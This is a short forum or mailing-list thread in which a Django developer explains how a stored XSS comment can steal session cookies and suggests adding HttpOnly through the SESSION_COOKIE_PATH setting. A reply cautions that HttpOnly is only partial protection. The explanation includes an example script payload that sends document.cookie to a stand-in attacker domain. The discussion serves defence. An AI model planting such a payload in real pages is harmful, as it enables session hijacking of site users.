Cookie Tip
cootetom
A little tip when using cookies for django sessions and
authentication. By default, django will create a session cookie and
send it to the client which contains the unique identifier for the
current users session. This session ID is used to keep the user logged
in between page requests and to retrieve session saved data back on
the server to use in your python code. However, using JavaScript you
can easily see and read this cookie from the document.cookie variable.
This means that if by some unfortunate circumstance there is an HTML
injection vulnerability on your django powered web site then cookie's
can be stolen using JavaScript by sending the cookie data to another
domain.
I must say at this point that the django framework already makes it
extremely difficult to have an HTML injection vulnerability due to the
way it escapes template data by default. However, developers who don't
necessarily understand it or have just been coding without checking
for these things may well allow HTML/JavaScript to be injected on a
web page where they did not mean to.
HTML injection works like this:
1.Mr Hacker Dude visits your web site and posts a message in a comment
area somewhere.
2.The message contains the script as follows
<s;script>location.href='http://mybadhackersite.com/?
cookie=document.cookie;</script>
3.Later on, Mr Normal User logs on to your web site and reads the
message that My Hacker Dude posted.
4.The script is run on the page and Mr Normal User's session cookie is
sent to Mr Hacker Dude.
5.Mr Hacker Dude visits the web site and sends the stolen session
cookie in his first request to the web site.
6.Mr Hacker Dude is now logged in as Mr Normal User.
Like I've said previously, django's templating engine will prevent the
script from Mr Hacker Dude being run by default anyway but in some
circumstances this default behaviour may have been overwritten for
some reason. So ideally we would like to prevent JavaScript from being
able to read our session cookie, thus making it much harder for this
type of attack to happen.
The tip here is to add the following to your settings.py file
SESSION_COOKIE_PATH = '/;HttpOnly'
If your cookie path is anything other that "/" then just add
";HttpOnly" to the end what ever it is. This helps prevent the cookie
from being read by the client and in JavaScript. It does not prevent
the cookie from being read entirely but certainly helps toward HTML
injection to steal cookie data.
You can test this your self. Start your django powered web site, log
in and type the following into the web browsers address bar
JavaScript:alert(document.cookie); You should see your session cookie
in the alert. Now append the ";HttpOnly" string to your path in
settings.py, re-start your web site and do the same alert. The cookie
will not be read by JavaScript this time around.
I hope this has been interesting and helpful.
Regards,
- Tom Coote
Malcolm Box
The tip here is to add the following to your settings.py file
SESSION_COOKIE_PATH = '/;HttpOnly'
Useful information - however be warned this isn't a panacea. See http://www.owasp.org/index.php/HTTPOnly#Browsers_Supporting_HTTPOnly for which browsers and which attacks this prevents.
Even so, it adds another layer of security and that's a good thing.
Cheers,
Malcolm